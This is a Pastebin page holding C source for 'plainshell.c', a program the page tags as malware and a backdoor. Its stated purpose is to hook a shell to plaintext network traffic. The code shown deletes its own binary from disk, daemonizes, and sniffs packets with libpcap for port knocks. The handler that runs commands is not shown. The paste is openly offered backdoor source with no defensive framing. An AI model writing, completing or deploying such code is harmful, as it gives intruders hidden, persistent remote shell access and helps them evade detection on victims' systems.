API tools faq
paste
Advertisement
FlyFar

plainshell.c

FlyFar
Jan 20th, 2024
592
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 2.54 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. /*
  2.  * plainshell.c
  3.  * Hooks up a shell to plaintext network comms
  4.  * By J. Stuart McMurray
  5.  * Created 20160316
  6.  * Last Modified 20160319
  7.  */
  8.  
  9. #include "plainshell.h"
  10.  
  11. int main(int argc, char **argv) {
  12.         int ret;
  13.         pcap_t *p;
  14.  
  15.         /* If the first argument is --k, make a knock */
  16.         if (4 == argc && 0 == strncmp(argv[1], KNOCKFLAG, sizeof(KNOCKFLAG))) {
  17.                 return make_knock(argv[2], argv[3]);
  18.         }
  19.  
  20.         /* Ignore child processess death */
  21.         signal(SIGCHLD, SIG_IGN);
  22.  
  23.         /* Remove this binary */
  24.         rmbin(argv[0]);
  25.  
  26.         /* Daemonize */
  27.         if (-1 == daemon(0, 1)) {
  28.                 err(1, "daemon");
  29.         }
  30.  
  31.         /* Remove leading ./ from name */
  32.         remove_dot_slash(&(argv[0]));
  33.  
  34.         /* Start pcap going */
  35.         p = init_pcap();
  36.  
  37.         /* Handle children */
  38.         if (0 != (ret = pcap_loop(p, -1, handle, (u_char *)&(argv[0])))) {
  39.                 pcap_perror(p, "pcap_loop");
  40.                 return ret;
  41.         }
  42.  
  43.         /* Shouldn't reach here */
  44.         return 255;
  45. }
  46.  
  47. /* init_pcap sets up a pcap monitorer. */
  48. pcap_t *init_pcap() {
  49.         pcap_t *p;                       /* Pcap handle */
  50.         struct bpf_program fp;           /* BPF filter */
  51.         char errbuf[PCAP_ERRBUF_SIZE+1]; /* Error buffer */
  52.  
  53.         p = NULL;
  54.         errbuf[PCAP_ERRBUF_SIZE] = '\0';
  55.  
  56.         /* Start pcap session */
  57.         if (NULL == (p = pcap_open_live(DEVICE, 65535, 0, -1, errbuf))) {
  58.                 errx(2, "pcap_open_live: %s", errbuf);
  59.         }
  60.  
  61.         /* Set filter */
  62.         if (-1 == pcap_compile(p, &fp, FILTER, 1, 0)) {
  63.                 pcap_perror(p, "pcap_compile");
  64.                 exit(3);
  65.         }
  66.         if (-1 == pcap_setfilter(p, &fp)) {
  67.                 pcap_perror(p, "pcap_setfilter");
  68.                 exit(4);
  69.         }
  70.  
  71.         return p;
  72. }
  73.  
  74. /* remove_dot_slash removes the leading ./ from the string at ./ by changing
  75.  * where the passed-in pointer points.  Thus, there is two bytes of leakage.
  76.  * If the string doesn't start with ./, nothing happens. */
  77. void remove_dot_slash(char **s) {
  78.         if (('.' == (*s)[0]) && ('/' == (*s)[1])) {
  79.                 *s+=2;
  80.         }
  81. }
  82.  
  83. /* rmbin removes whatever is at p, if it exists */
  84. void rmbin(char *p) {
  85.         struct stat st;
  86.         printf("P: %s\n", p); /* DEBUG */
  87.         if (-1 == lstat(p, &st)) {
  88.                 warn("lstat");
  89.                 return;
  90.         }
  91.         if (-1 == unlink(p)) {
  92.                 warn("unlink");
  93.         }
  94. }
Tags: malware Backdoor
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!